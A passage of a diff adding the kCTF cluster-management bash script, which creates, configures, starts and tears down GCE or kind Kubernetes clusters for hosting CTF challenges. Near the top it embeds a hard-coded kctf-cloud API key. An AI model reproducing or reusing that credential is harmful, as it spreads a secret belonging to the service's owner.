+ +source "${KCTF_BIN}/kctf-log" + +BYE_MSG="" +KCTF_CLOUD_BASE_URL="https://kctf-cloud.appspot.com/v1" +# owned by kctf-cloud +KCTF_CLOUD_API_KEY="AIzaSyC7Jgu4e0IygmImZNPmJHrcfZ3lJA9ZrZs" + +if [[ "$OSTYPE" =~ ^darwin.* ]]; then + GETOPT="$(brew --prefix gnu-getopt)/bin/getopt" +else + GETOPT="getopt" +fi + +function update_gcloud_config { + _kctf_log "Updating gcloud config." + ACTIVE_ACCOUNT="$(CLOUDSDK_ACTIVE_CONFIG_NAME= gcloud config get-value core/account 2>/dev/null)" + export CLOUDSDK_ACTIVE_CONFIG_NAME="kctf-${KCTF_SESSION}" + if ! gcloud config configurations describe "${CLOUDSDK_ACTIVE_CONFIG_NAME}" >/dev/null 2>/dev/null; then + gcloud config configurations create --no-activate "${CLOUDSDK_ACTIVE_CONFIG_NAME}" >/dev/null 2>/dev/null || return + fi + gcloud config set core/account "${ACTIVE_ACCOUNT}" >/dev/null || return + gcloud config set core/project "${PROJECT}" >/dev/null || return + gcloud config set compute/zone "${ZONE}" >/dev/null || return + gcloud config set container/cluster "${CLUSTER_NAME}" >/dev/null || return +} + +function set_lastconfig_link { + ln -sf "${CONFIG_NAME}" "${KCTF_CTF_DIR}/kctf/config/.lastconfig" +} + +function kctf_cluster_load_usage { + echo "usage: kctf cluster load config_name" >&2 + echo " run \"kctf cluster list\" to see a list of options" >&2 +} + +function kctf_cluster_load { + if [[ $# -ne 1 ]]; then + _kctf_log_err "missing config name" + kctf_cluster_load_usage + return 1 + fi + + if [[ "$1" == "-h" ]] || [[ "$1" == "--help" ]]; then + kctf_cluster_load_usage + return 0 + fi + + CONFIG_NAME="$1" + if [[ "${CONFIG_NAME}" == ".lastconfig" ]]; then + CONFIG_NAME=$(readlink "${KCTF_CTF_DIR}/kctf/config/.lastconfig") + if [[ $? -ne 0 ]]; then + _kctf_log_err "could not resolve .lastconfig link" + return 1 + fi + fi + CONFIG_PATH="${KCTF_CTF_DIR}/kctf/config/${CONFIG_NAME}" + shift + + source "${CONFIG_PATH}" || return + + case "${CLUSTER_TYPE}" in + gce) + if ! command -v gcloud >/dev/null 2>&1; then + _kctf_log_err "gcloud not installed" + return 1 + fi + update_gcloud_config || return + + # try to fetch the creds of the k8s cluster + gcloud container clusters get-credentials "${CLUSTER_NAME}" >/dev/null 2>/dev/null + ;; + kind) + kube_config=$("${KCTF_BIN}/kind" get kubeconfig --name "${CLUSTER_NAME}" 2>/dev/null) + if [[ $? 
-eq 0 ]]; then + echo "${kube_config}" > "${KUBECONFIG}" + fi + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac + + _kctf_log "loaded config" + + set_lastconfig_link + + echo "${CONFIG_NAME}" +} + +function kctf_cluster_list { + echo "== available cluster configurations ==" + for file in ${KCTF_CTF_DIR}/kctf/config/*; do + CONFIG_NAME="$(basename $file)" + if [[ "${CONFIG_NAME}" = ".lastconfig" ]]; then + continue + fi + echo "${CONFIG_NAME}" + done +} + +function kctf_cluster_create_usage { + echo "usage: kctf cluster create [args] config_name" >&2 + echo " -h|--help print this help" >&2 + echo " --type what kind of cluster to create (default: gce)" >&2 + echo " supported values: \"gce\" (remote cluster) and \"kind\" (local cluster)" >&2 + echo " --project Required (gce): Google Cloud Platform project name" >&2 + echo " --zone GCP Zone (default: europe-west4-b)" >&2 + echo " For a list of zones run:" >&2 + echo " gcloud compute machine-types list --filter=\"name=( n2-standard-4 )\" --format 'value(zone)'" >&2 + echo " --registry Container Registry (default: eu.gcr.io)" >&2 + echo " Possible values are us.gcr.io, asia.gcr.io, and eu.gcr.io" >&2 + echo " --cluster-name Name of the kubernetes cluster (default: kctf-cluster)" >&2 + echo " --domain-name Required (gce): domain name to host challenges under" >&2 + echo " Please make sure not to put anything secret in the challenge name." >&2 + echo " Supported options:" >&2 + echo " \"none\": disable DNS support (might break some functionality)" >&2 + echo " \"your.domain.com\": use your own domain. You will have to follow some" >&2 + echo " additional steps to configure your nameserver." >&2 + echo " \"yourname.kctf.cloud\": automatically get a subdomain under kctf.cloud" >&2 + echo " --email-address Optional email address for LetsEncrypt registration (for wildcard certificates)" >&2 + echo " To use it, please read and agree to the ACME Subscriber Agreement:" >&2 + echo " https://letsencrypt.org/repository/" >&2 + echo " --start Start the cluster if it's not running yet" >&2 + echo " --disable-src-ranges Disable the ip range feature (requires --start). Use this if you have security policy quota issues" >&2 +} + +function kctf_cluster_create { + # Default Configuration + CLUSTER_TYPE="gce" + REGISTRY="eu.gcr.io" + PROJECT="" + ZONE="europe-west4-b" + CLUSTER_NAME="kctf-cluster" + DOMAIN_NAME="" + EMAIL_ADDRESS="" + START_CLUSTER="0" + DISABLE_SRC_RANGES="" + + OPTS="h" + LONGOPTS="help,type:,project:,zone:,registry:,cluster-name:,domain-name:,email-address:,start,disable-src-ranges" + PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf cluster create" -- "$@") + if [[ $? -ne 0 ]]; then + kctf_cluster_create_usage + return 1 + fi + eval set -- "$PARSED" + + while true; do + case "$1" in + -h|--help) + kctf_cluster_create_usage + return 1 + ;; + --type) + CLUSTER_TYPE=$2 + shift 2 + ;; + --project) + PROJECT=$2 + shift 2 + ;; + --zone) + ZONE=$2 + shift 2 + ;; + --registry) + REGISTRY=$2 + shift 2 + ;; + --cluster-name) + CLUSTER_NAME=$2 + shift 2 + ;; + --domain-name) + DOMAIN_NAME="$2" + shift 2 + ;; + --email-address) + EMAIL_ADDRESS="$2" + shift 2 + ;; + --start) + START_CLUSTER="1" + shift + ;; + --disable-src-ranges) + DISABLE_SRC_RANGES="--disable-src-ranges" + shift + ;; + --) + shift + break + ;; + *) + _kctf_log_err "Unrecognized argument \"$1\"." 
+ kctf_cluster_create_usage + return 1 + ;; + esac + done + + if [[ $# -ne 1 ]]; then + _kctf_log_err "kctf cluster create: cluster config name missing" + kctf_cluster_create_usage + return 1 + fi + + CONFIG_NAME="$1" + if [[ "${CONFIG_NAME}" == ".lastconfig" ]]; then + CONFIG_NAME=$(readlink "${KCTF_CTF_DIR}/kctf/config/.lastconfig") + if [[ $? -ne 0 ]]; then + _kctf_log_err "could not resolve .lastconfig link" + return 1 + fi + fi + CONFIG_PATH="${KCTF_CTF_DIR}/kctf/config/${CONFIG_NAME}" + shift + + case "${CLUSTER_TYPE}" in + gce) + if [[ -z "$PROJECT" ]]; then + _kctf_log_err "Missing required argument \"--project\"." + kctf_cluster_create_usage + return 1 + fi + if [[ -z "${DOMAIN_NAME}" ]]; then + _kctf_log_err "Missing required argument \"--domain-name\"." + kctf_cluster_create_usage + return 1 + fi + ;; + kind) + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac + + if [[ "${DOMAIN_NAME}" == "none" ]]; then + DOMAIN_NAME="" + fi + + + mkdir -p "${KCTF_CTF_DIR}/kctf/config" || return + + if [ -e "${CONFIG_PATH}" ]; then + _kctf_log_warn "Overwriting existing cluster config file. Old content:" + cat "${CONFIG_PATH}" >&2 + rm "${CONFIG_PATH}" >&2 + fi + + cat > "${CONFIG_PATH}" << EOF +CLUSTER_TYPE=${CLUSTER_TYPE} +PROJECT=${PROJECT} +ZONE=${ZONE} +REGISTRY=${REGISTRY} +CLUSTER_NAME=${CLUSTER_NAME} +DOMAIN_NAME=${DOMAIN_NAME} +EMAIL_ADDRESS=${EMAIL_ADDRESS} +EOF + if [[ $? -ne 0 ]]; then return 1; fi + + set_lastconfig_link || return + + case "${CLUSTER_TYPE}" in + gce) + if ! command -v gcloud >/dev/null 2>&1; then + if [[ "${START_CLUSTER}" == "1" ]]; then + _kctf_log_err "Can't start cluster, configuration created only locally. Gcloud not installed." + return 1 + else + _kctf_log_warn "Configuration created only locally. Gcloud not installed." + return 0 + fi + fi + update_gcloud_config || return + # try to fetch the creds of the k8s cluster + gcloud container clusters get-credentials "${CLUSTER_NAME}" >/dev/null 2>/dev/null + GET_CLUSTER_CREDS_RESULT=$? + ;; + kind) + kube_config=$("${KCTF_BIN}/kind" get kubeconfig --name "${CLUSTER_NAME}" 2>/dev/null) + GET_CLUSTER_CREDS_RESULT=$? + if [[ "${GET_CLUSTER_CREDS_RESULT}" -eq 0 ]]; then + echo "${kube_config}" > "${KUBECONFIG}" + fi + ;; + *) + _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\"" + return 1 + ;; + esac + + # there might be an existing cluster + # if it already exists, we try to update it + # otherwise, start it if requested + if [[ "${START_CLUSTER}" == "1" ]]; then + if [[ ${GET_CLUSTER_CREDS_RESULT} -eq 0 ]]; then + _kctf_log "Existing cluster found, updating cluster." + else + _kctf_log "Starting cluster." + fi + export CLUSTER_TYPE + export PROJECT + export ZONE + export REGISTRY + export CLUSTER_NAME + export DOMAIN_NAME + export EMAIL_ADDRESS + "${KCTF_BIN}/kctf-cluster" start "${DISABLE_SRC_RANGES}" >&2 || return + elif [[ ${GET_CLUSTER_CREDS_RESULT} -eq 0 ]]; then + _kctf_log_warn "Existing cluster found. If it's running an old version of kCTF, remember to upgrade it with cluster start." 
+  fi
+
+  echo "${CONFIG_NAME}"
+}
+
+function kctf_cluster_get_ip_ranges {
+  if [[ "${CLUSTER_TYPE}" != "gce" ]]; then
+    _kctf_log_err "this command is only supported for GCE clusters"
+    return 1
+  fi
+
+  get_cloud_armor_policy || return
+  _kctf_log "Current IP range: \"$ret\""
+}
+
+function kctf_cluster_ip_ranges_usage {
+  echo "usage: kctf cluster set-src-ip-ranges ranges" >&2
+  echo "  -h|--help  print this help" >&2
+  echo "  ranges     ip ranges to allow of the form 1.1.1.1/32,2.2.2.0/24" >&2
+}
+
+function kctf_cluster_ip_ranges {
+  if [[ "${CLUSTER_TYPE}" != "gce" ]]; then
+    _kctf_log_err "this command is only supported for GCE clusters"
+    return 1
+  fi
+
+  OPTS="h"
+  LONGOPTS="help"
+  PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf cluster set-src-ip-ranges" -- "$@")
+  if [[ $? -ne 0 ]]; then
+    kctf_cluster_ip_ranges_usage
+    return 1
+  fi
+  eval set -- "$PARSED"
+
+  while true; do
+    case "$1" in
+      -h|--help)
+        kctf_cluster_ip_ranges_usage
+        return 1
+        ;;
+      --)
+        shift
+        break
+        ;;
+      *)
+        _kctf_log_err "Unrecognized argument \"$1\"."
+        kctf_cluster_ip_ranges_usage
+        return 1
+        ;;
+    esac
+  done
+
+  if [[ $# -ne 1 ]]; then
+    _kctf_log_err "kctf cluster set-src-ip-ranges: expecting a single range argument"
+    kctf_cluster_ip_ranges_usage
+    return 1
+  fi
+
+  RANGES="$1"
+
+  # update the cloud armor policy
+  set_cloud_armor_policy "${RANGES}" || return
+
+  # stop the operator
+  "${KCTF_BIN}/yq" eval "select(.kind == \"Deployment\")" "${KCTF_CTF_DIR}/kctf/resources/operator.yaml" \
+    | "${KCTF_BIN}/kubectl" delete -f - || return
+
+  start_operator_gce || return
+}
+
+function start_operator_gce {
+  if [[ "${DISABLE_SRC_RANGES}" == "1" ]]; then
+    "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/operator.yaml" || return
+  else
+    get_cloud_armor_policy || return
+    RANGES=$ret
+    SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum)
+    POLICY_NAME="kctf-policy-${SUFFIX:0:16}"
+    # restart the operator with the new range
+    "${KCTF_BIN}/yq" eval "(select(.kind == \"Deployment\").spec.template.spec.containers[] | select(.name == \"manager\").env[] | select(.name == \"ALLOWED_IPS\").value) |= \"${RANGES}\"" "${KCTF_CTF_DIR}/kctf/resources/operator.yaml" \
+      | "${KCTF_BIN}/yq" eval "(select(.kind == \"Deployment\").spec.template.spec.containers[] | select(.name == \"manager\").env[] | select(.name == \"SECURITY_POLICY\").value) |= \"${POLICY_NAME}\"" - \
+      | "${KCTF_BIN}/kubectl" apply -f - || return
+  fi
+}
+
+function set_cloud_armor_policy {
+  SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum)
+  POLICY_NAME="kctf-policy-${SUFFIX:0:16}"
+  gcloud compute security-policies rules update --action allow --security-policy "${POLICY_NAME}" --src-ip-ranges "$1" 0 || return
+}
+
+function get_cloud_armor_policy {
+  SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum)
+  POLICY_NAME="kctf-policy-${SUFFIX:0:16}"
+  ret=$(gcloud compute security-policies rules describe --security-policy "${POLICY_NAME}" 0 --format 'value[delimiter=","](match.config.srcIpRanges)')
+}
+
+function create_cloud_armor_policy {
+  SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum)
+  POLICY_NAME="kctf-policy-${SUFFIX:0:16}"
+  if [[ -z $(gcloud compute security-policies list --filter "name=${POLICY_NAME}" --format 'get(name)') ]]; then
+    gcloud compute security-policies create "${POLICY_NAME}" || return
+    gcloud compute security-policies rules create --action allow --security-policy "${POLICY_NAME}" --src-ip-ranges "0.0.0.0/0" 0 || return
+
+    # make sure the default
policy (2147483647) is deny + gcloud compute security-policies rules update --action deny-404 --security-policy "${POLICY_NAME}" 2147483647 || return + + set_cloud_armor_policy "0.0.0.0/0" || return + fi +} + +function create_operator { + # Creating CRD, rbac and operator + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/kctf.dev_challenges.yaml" || return + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/kctf-operator-metrics-reader_rbac.authorization.k8s.io_v1_clusterrole.yaml" || return + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/kctf-operator-manager-config_v1_configmap.yaml" || return + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/kctf-operator-controller-manager-metrics-service_v1_service.yaml" || return + if [[ "$CLUSTER_TYPE" == "gce" ]]; then + start_operator_gce || return + else + "${KCTF_BIN}/kubectl" apply -f "${KCTF_CTF_DIR}/kctf/resources/operator.yaml" || return + fi + OPERATOR_IMAGE=$("${KCTF_BIN}/yq" eval '.spec.template.spec.containers[].image | select(.=="*kctf-operator*")' "${KCTF_CTF_DIR}/kctf/resources/operator.yaml") + if [[ $? -ne 0 ]]; then + echo "Failed to find the operator image." >&2 + return 1 + fi + + # The operator needs to create some subresources, e.g. the gcsfuse service account + for i in {1..100}; do + "${KCTF_BIN}/kubectl" get pods --namespace kctf-operator-system -o=jsonpath='{.items[*].status.containerStatuses[?(@.ready==true)].imageID}' | grep "${OPERATOR_IMAGE}" && break + if [ "$i" == "100" ]; then + _kctf_log_err "Couldn't find a kctf-operator pod with status ready=true and image \"${OPERATOR_IMAGE}\" after 5 minutes" + "${KCTF_BIN}/kubectl" get pods --namespace kctf-operator-system -o=yaml >&2 + exit 1 + fi + echo -n '.' + sleep 3 + done +} + +function wait_for_nameserver { + nameserver="$1" + initial_timeout=300 + timeout=$initial_timeout + sleep_time=10 + while [[ "${timeout}" -gt 0 ]]; do + if nslookup -nosearch -norecurse -type=NS "${DOMAIN_NAME}." "${nameserver}" >/dev/null 2>/dev/null; then + return 0 + fi + _kctf_log "nameserver didn't serve NS record yet, sleeping for ${sleep_time}s" + sleep ${sleep_time} + timeout=$(($timeout - $sleep_time)) + done + _kctf_log_err "nameserver didn't serve NS record after ${initial_timeout}s" + return 1 +} + +required_apis=("containerregistry.googleapis.com" "compute.googleapis.com" "container.googleapis.com" "dns.googleapis.com") + +function check_required_apis { + GCP_APIS="$(gcloud services list --format 'get(config.name)')" + for required_api in "${required_apis[@]}"; do + if [[ ! "${GCP_APIS}" =~ "${required_api}" ]]; then + _kctf_log_err "Required GCP API \"${required_api}\" is not enabled" + return 1 + fi + done + return 0 +} + +function kctf_cluster_start_gce { + MIN_NODES="1" + MAX_NODES="2" + NUM_NODES="1" + MACHINE_TYPE="n2-standard-4" + SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum) + NETWORK="kctf-network-${SUFFIX:0:16}" + + if ! 
check_required_apis; then + _kctf_log_err "Please enable the required APIs by running 'gcloud services enable ${required_apis[@]}'" + return 1 + fi + + EXISTING_NETWORK=$(gcloud compute networks list --filter="name=${NETWORK}" --format 'get(name)') + if [ -z "${EXISTING_NETWORK}" ]; then + gcloud compute networks create ${NETWORK} --description "kCTF network for cluster ${CLUSTER_NAME}" >/dev/null || return + fi + + EXISTING_CLUSTER=$(gcloud container clusters list --filter "name=${CLUSTER_NAME}" --format 'get(name)') + if [ -z "${EXISTING_CLUSTER}" ]; then + CIDR="172.16.0.32/28" + gcloud container clusters create --release-channel=regular --enable-network-policy --enable-autoscaling --min-nodes ${MIN_NODES} --max-nodes ${MAX_NODES} --num-nodes ${NUM_NODES} --network ${NETWORK} --create-subnetwork name=kctf-subnet-${NETWORK} --no-enable-master-authorized-networks --enable-ip-alias --enable-private-nodes --master-ipv4-cidr ${CIDR} --enable-autorepair --preemptible --machine-type ${MACHINE_TYPE} --workload-pool=${PROJECT}.svc.id.goog ${CLUSTER_NAME} || return + fi + + EXISTING_ROUTER=$(gcloud compute routers list --filter "name=kctf-${CLUSTER_NAME}-nat-router" --format 'get(name)') + if [ -z "${EXISTING_ROUTER}" ]; then + gcloud compute routers create "kctf-${CLUSTER_NAME}-nat-router" --network="${NETWORK}" --region "${ZONE::${#ZONE}-2}" || return + fi + + EXISTING_NAT=$(gcloud compute routers nats list --router "kctf-${CLUSTER_NAME}-nat-router" --router-region "${ZONE::${#ZONE}-2}" --format 'get(name)') + if [ -z "${EXISTING_NAT}" ]; then + gcloud compute routers nats create "kctf-${CLUSTER_NAME}-nat-config" --router-region "${ZONE::${#ZONE}-2}" --router kctf-${CLUSTER_NAME}-nat-router --nat-all-subnet-ip-ranges --auto-allocate-nat-external-ips || return + fi + + "${KCTF_BIN}/kubectl" create namespace "kctf-system" --dry-run=client -oyaml | "${KCTF_BIN}/kubectl" apply -f - >&2 || return + + # GCSFUSE + + BUCKET_NAME="kctf-gcsfuse-${SUFFIX:0:16}" + GCS_GSA_NAME="${BUCKET_NAME}" + GCS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${GCS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)' || true) + if [ -z "${GCS_GSA_EMAIL}" ]; then + gcloud iam service-accounts create "${GCS_GSA_NAME}" --description "kCTF GCSFUSE service account ${CLUSTER_NAME} ${ZONE}" --display-name "kCTF GCSFUSE ${CLUSTER_NAME} ${ZONE}" || return + GCS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${GCS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)') + while [ -z "${GCS_GSA_EMAIL}" ]; do + sleep 1 + GCS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${GCS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)') + done + fi + + GCS_KSA_NAME="gcsfuse-sa" + + gcloud iam service-accounts add-iam-policy-binding --role roles/iam.workloadIdentityUser --member "serviceAccount:${PROJECT}.svc.id.goog[kctf-system/${GCS_KSA_NAME}]" ${GCS_GSA_EMAIL} || return + "${KCTF_BIN}/kubectl" create serviceaccount --namespace kctf-system ${GCS_KSA_NAME} --save-config --dry-run=client -o yaml | "${KCTF_BIN}/kubectl" apply -f - || return + "${KCTF_BIN}/kubectl" annotate serviceaccount --namespace kctf-system ${GCS_KSA_NAME} iam.gke.io/gcp-service-account=${GCS_GSA_EMAIL} --overwrite || return + + if ! 
gsutil du "gs://${BUCKET_NAME}/"; then + gsutil mb -l eu "gs://${BUCKET_NAME}/" || return + fi + + if gsutil uniformbucketlevelaccess get "gs://${BUCKET_NAME}" | grep -q "Enabled: True"; then + gsutil iam ch "serviceAccount:${GCS_GSA_EMAIL}:roles/storage.legacyBucketOwner" "gs://${BUCKET_NAME}" || return + gsutil iam ch "serviceAccount:${GCS_GSA_EMAIL}:roles/storage.legacyObjectOwner" "gs://${BUCKET_NAME}" || return + else + gsutil acl ch -u "${GCS_GSA_EMAIL}:O" "gs://${BUCKET_NAME}" || return + fi + + "${KCTF_BIN}/kubectl" create configmap gcsfuse-config --from-literal=gcs_bucket="${BUCKET_NAME}" --namespace kctf-system --dry-run=client -o yaml | "${KCTF_BIN}/kubectl" apply -f - || return + + "${KCTF_BIN}/kubectl" patch ServiceAccount default --patch "automountServiceAccountToken: false" || return + + # Cloud DNS + + if [ ! -z "${DOMAIN_NAME}" ]; then + ZONE_NAME=$(gcloud dns managed-zones list --filter "dns_name:${DOMAIN_NAME}." --format 'get(name)') + + if [ -z "${ZONE_NAME}" ]; then + ZONE_NAME="kctf-$(echo ${DOMAIN_NAME} | sed 's/[.]/--/g')" + _kctf_log "creating new managed-zone \"${ZONE_NAME}\"" + gcloud dns managed-zones create "${ZONE_NAME}" --description "DNS Zone for ${DOMAIN_NAME}" --dns-name="${DOMAIN_NAME}." || return + soa_ttl="$(gcloud dns record-sets list --zone=${ZONE_NAME} --type=SOA --name="${DOMAIN_NAME}." --format='get(ttl)')" + if [[ $? -ne 0 ]]; then return 1; fi + soa_data="$(gcloud dns record-sets list --zone=${ZONE_NAME} --type=SOA --name="${DOMAIN_NAME}." --format='get(rrdatas)')" + if [[ $? -ne 0 ]]; then return 1; fi + new_soa=($soa_data) + # update the serial no + new_soa[2]=$((${new_soa[2]} + 1)) + # change the ttl + new_soa[6]="60" + + _kctf_log "changing the SOA entry to reduce TTL" + gcloud dns record-sets transaction start --zone="${ZONE_NAME}" || return + gcloud dns record-sets transaction remove --zone="${ZONE_NAME}" --name "${DOMAIN_NAME}." --ttl "${soa_ttl}" --type "SOA" "${soa_data}" || return + gcloud dns record-sets transaction add --zone="${ZONE_NAME}" --name "${DOMAIN_NAME}." --ttl "60" --type "SOA" "${new_soa[*]}" || return + gcloud dns record-sets transaction describe --zone="${ZONE_NAME}" || return + if ! 
gcloud dns record-sets transaction execute --zone="${ZONE_NAME}"; then + gcloud dns record-sets transaction abort --zone="${ZONE_NAME}" || return + _kctf_log_err 'updating the SOA entry failed' + exit 1 + fi + _kctf_log "SOA updated" + else + _kctf_log "managed-zone \"${ZONE_NAME}\" exists, reusing" + fi + + DNS_ZONE_NAMESERVERS=$(gcloud dns managed-zones describe "${ZONE_NAME}" --format 'value[delimiter="\n"](nameServers)') + if [[ "${DOMAIN_NAME}" == *".kctf.cloud" ]]; then + _kctf_log "waiting for nameservers to be updated (should take roughly 1m)" + for nameserver in ${DNS_ZONE_NAMESERVERS}; do + wait_for_nameserver "${nameserver}" || return + done + KCTF_CLOUD_URL="${KCTF_CLOUD_BASE_URL}/subdomain?name=${DOMAIN_NAME%.kctf.cloud}&nameservers=$(paste -sd ',' <(echo "${DNS_ZONE_NAMESERVERS}"))" + _kctf_log 'requesting kctf.cloud subdomain' + kctf_cloud_tries=3 + kctf_cloud_timeout=10 + while true; do + curl --fail -X POST -H "x-api-key: ${KCTF_CLOUD_API_KEY}" "${KCTF_CLOUD_URL}" >/dev/null && break + kctf_cloud_tries=$(($kctf_cloud_tries - 1)) + if [[ $kctf_cloud_tries -le 0 ]]; then + _kctf_log_err 'could not register kctf.cloud subdomain' + exit 1 + fi + _kctf_log_warn "registering kctf.cloud subdomain failed, retrying in ${kctf_cloud_timeout}s" + sleep "${kctf_cloud_timeout}" + done + else + # print in red for attention + _kctf_log $'\001\e[0;31m\002'"ATTENTION: "$'\001\e[0m\002'"You need to add the following NS entries for your domain \"${DOMAIN_NAME}\":"$'\n'"${DNS_ZONE_NAMESERVERS}" + BYE_MSG=$'\001\e[0;31m\002'"ATTENTION: "$'\001\e[0m\002'"You need to add the following NS entries for your domain \"${DOMAIN_NAME}\":"$'\n'"${DNS_ZONE_NAMESERVERS}" + fi + + DNS_GSA_NAME="kctf-cloud-dns" + DNS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${DNS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)' || true) + + if [ -z "${DNS_GSA_EMAIL}" ]; then + gcloud iam service-accounts create "${DNS_GSA_NAME}" --description "kCTF Cloud DNS service account ${CLUSTER_NAME} ${ZONE}" --display-name "kCTF Cloud DNS ${CLUSTER_NAME} ${ZONE}" || return + DNS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${DNS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)') + while [ -z "${DNS_GSA_EMAIL}" ]; do + sleep 1 + DNS_GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${DNS_GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)') + done + fi + + DNS_KSA_NAME="external-dns-sa" + + gcloud iam service-accounts add-iam-policy-binding --role roles/iam.workloadIdentityUser --member "serviceAccount:${PROJECT}.svc.id.goog[kctf-system/${DNS_KSA_NAME}]" ${DNS_GSA_EMAIL} || return + "${KCTF_BIN}/kubectl" create serviceaccount --namespace kctf-system ${DNS_KSA_NAME} --save-config --dry-run=client -o yaml | "${KCTF_BIN}/kubectl" apply -f - || return + "${KCTF_BIN}/kubectl" annotate serviceaccount --namespace kctf-system ${DNS_KSA_NAME} iam.gke.io/gcp-service-account=${DNS_GSA_EMAIL} --overwrite || return + + gcloud projects add-iam-policy-binding ${PROJECT} --member=serviceAccount:${DNS_GSA_EMAIL} --role=roles/dns.admin || return + + "${KCTF_BIN}/kubectl" create configmap --namespace kctf-system external-dns --from-literal=DOMAIN_NAME=${DOMAIN_NAME} --from-literal=EMAIL_ADDRESS=${EMAIL_ADDRESS:-} --dry-run=client -o yaml | "${KCTF_BIN}/kubectl" apply -f - || return + fi + + if [[ "${DISABLE_SRC_RANGES}" == "0" ]]; then + if ! create_cloud_armor_policy; then + echo "Could not create the cloud armor policy. 
If you have quota issues, you can disable the feature with --disable-src-ranges." >&2
+      return 1
+    fi
+  fi
+
+  create_operator || return
+}
+
+function kctf_cluster_start_usage {
+  echo "usage: kctf cluster start [args]" >&2
+  echo "  -h|--help             print this help" >&2
+  echo "  --disable-src-ranges  Disable the ip range feature (gce only). Use this if you have security policy quota issues" >&2
+}
+
+function kctf_cluster_start {
+  DISABLE_SRC_RANGES="0"
+
+  OPTS="h"
+  LONGOPTS="help,disable-src-ranges"
+  PARSED=$(${GETOPT} --options=$OPTS --longoptions=$LONGOPTS --name "kctf cluster start" -- "$@")
+  if [[ $? -ne 0 ]]; then
+    kctf_cluster_start_usage
+    return 1
+  fi
+  eval set -- "$PARSED"
+
+  while true; do
+    case "$1" in
+      -h|--help)
+        kctf_cluster_start_usage
+        return 1
+        ;;
+      --disable-src-ranges)
+        DISABLE_SRC_RANGES="1"
+        shift
+        ;;
+      --)
+        shift
+        break
+        ;;
+      *)
+        _kctf_log_err "Unrecognized argument \"$1\"."
+        kctf_cluster_start_usage
+        return 1
+        ;;
+    esac
+  done
+
+  case "${CLUSTER_TYPE}" in
+    gce)
+      kctf_cluster_start_gce
+      return
+      ;;
+    kind)
+      kctf_cluster_start_kind
+      return
+      ;;
+    *)
+      _kctf_log_err "unknown cluster type \"${CLUSTER_TYPE}\""
+      return 1
+      ;;
+  esac
+}
+
+function kctf_cluster_stop_gce {
+  read -p "Do you really want to delete the GKE cluster? If you are sure type the cluster name (${CLUSTER_NAME}): "
+  if [[ ! "${REPLY}" = "${CLUSTER_NAME}" ]]
+  then
+    return 1
+  fi
+  _kctf_log "deleting all challenges so that load balancers etc can be cleaned up"
+  CHALLENGES=$("${KCTF_BIN}/kubectl" get challenge --all-namespaces -o=jsonpath='{range .items[*]}{@.metadata.namespace}{"/"}{@.metadata.name}{" "}{end}')
+  if [[ ! -z "${CHALLENGES}" ]]; then
+    for chal_and_ns in ${CHALLENGES}; do
+      IFS='/' read -r -a chal_and_ns_array <<< "$chal_and_ns"
+      chal_namespace="${chal_and_ns_array[0]}"
+      chal_name="${chal_and_ns_array[1]}"
+      "${KCTF_BIN}/kubectl" delete "challenge/${chal_name}" --namespace "${chal_namespace}"
+    done
+  fi
+
+  # deleting the cluster below takes a while, so sleeping for a bit doesn't hurt
+  _kctf_log "Sleeping 20s to give time to delete resources"
+  sleep 20
+
+  CLOUDSDK_CORE_DISABLE_PROMPTS=1 gcloud container clusters delete ${CLUSTER_NAME}
+  gcloud compute routers delete "kctf-${CLUSTER_NAME}-nat-router" --region "${ZONE::${#ZONE}-2}" --quiet
+
+  SUFFIX=$(echo "${PROJECT}-${CLUSTER_NAME}-${ZONE}" | sha1sum)
+
+  NETWORK="kctf-network-${SUFFIX:0:16}"
+  gcloud compute networks delete ${NETWORK} --quiet
+
+  GSA_NAME="kctf-gcsfuse-${SUFFIX:0:16}"
+  GSA_EMAIL=$(gcloud iam service-accounts list --filter "email=${GSA_NAME}@${PROJECT}.iam.gserviceaccount.com" --format 'get(email)' || true)
+  # only delete the service account if it actually exists
+  if [ -n "${GSA_EMAIL}" ]; then
+    gcloud iam service-accounts delete "${GSA_EMAIL}"
+  fi
+}
+
+function kctf_cluster_start_kind {
+  if !
